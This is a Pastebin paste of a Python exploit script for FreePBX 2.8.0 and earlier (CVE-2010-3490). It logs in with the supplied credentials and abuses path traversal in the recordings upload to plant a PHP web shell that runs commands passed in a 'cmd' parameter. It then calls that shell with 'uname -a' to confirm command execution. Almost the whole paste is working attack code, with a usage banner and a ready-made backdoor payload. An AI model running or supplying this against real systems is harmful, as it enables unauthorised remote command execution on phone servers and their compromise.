Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import requests
- import random
- import string
- import sys
- # Original advisory : http://www.exploit-db.com/exploits/15098/
- print("devloop exploit for FreePBX <= 2.8.0 (CVE-2010-3490)")
- if len(sys.argv) != 4:
- print("Usage: {0} <url_to_freepbx_admin_directory> <username> <password>")
- sys.exit()
- BASE = sys.argv[1]
- USER = sys.argv[2]
- PASS = sys.argv[3]
- KEYW = "devloop"
- if not BASE.endswith("/"):
- BASE += "/"
- sess = requests.session()
- creds = (USER, PASS)
- r = sess.get(BASE + "config.php", auth=creds)
- if "Logged in:" in r.content:
- print("[+] Connection successful")
- else:
- print("[!] Unable to login... check credentials and url")
- sys.exit()
- data = {
- 'action': 'recorded',
- 'display': 'recordings',
- 'usersnum': '../../../../../var/www/html/admin/{0}'.format(KEYW),
- 'rname': "".join([random.choice(string.hexdigits) for _ in xrange(10)]),
- 'Submit': 'Save'
- }
- content = "<?php system($_GET['cmd']); ?>"
- files = {
- 'ivrfile': ('backdoor.php', content, 'application/octet-stream')
- }
- hdrs = {"referer": BASE + "config.php?type=setup&display=recordings"}
- r = sess.post(BASE + "config.php?type=setup&display=recordings",
- data=data,
- files=files,
- auth=creds,
- headers=hdrs)
- print("[i] Testing shell at address {0}{1}-ivrrecording.php".format(BASE, KEYW))
- r = requests.get(BASE + KEYW + "-ivrrecording.php?cmd=uname+-a", auth=creds)
- if r.status_code != 200:
- print("[-] Received HTTP code {0} for this url".format(r.status_code))
- else:
- print("HTTP 200 OK")
- print r.content
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement